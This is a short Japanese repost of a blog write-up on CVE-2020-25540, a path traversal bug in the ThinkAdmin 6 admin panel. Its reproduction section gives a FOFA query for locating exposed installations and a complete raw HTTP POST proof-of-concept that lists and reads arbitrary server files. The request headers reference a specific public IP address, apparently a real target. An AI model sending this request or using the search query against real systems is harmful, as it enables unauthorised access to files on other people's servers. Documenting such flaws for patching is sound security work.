ThinkAdminの任意のファイル読み取りの脆弱性(CVE-2020-25540)

簡単な説明

ThinkAdminは、ThinkPHPフレームワークに基づく一般的なバックグラウンド管理システムのセットです。

脆弱性の説明

ThinkAdmin6バージョンには、パストラバーサルの脆弱性があります。この脆弱性は主に、フィルタリングなしでAPIに危険な関数が存在することが原因です。攻撃者はこの脆弱性を利用して、エンコーディングパラメータを要求することにより、リモートサーバー上の任意のファイルを読み取ることができます。

脆弱性の再発

fofa検索文app="ThinkAdmin"
POC

POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://139.159.192.181
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.159.192.181/admin/login.html/?s=admin/api.Update/node
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=f54b3a7d1d63edc5a264133ef6865e95
Connection: close

rules=%5B%22%2F%22%5D

ここに画像の説明を挿入
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/weixin_44146996/article/details/113665215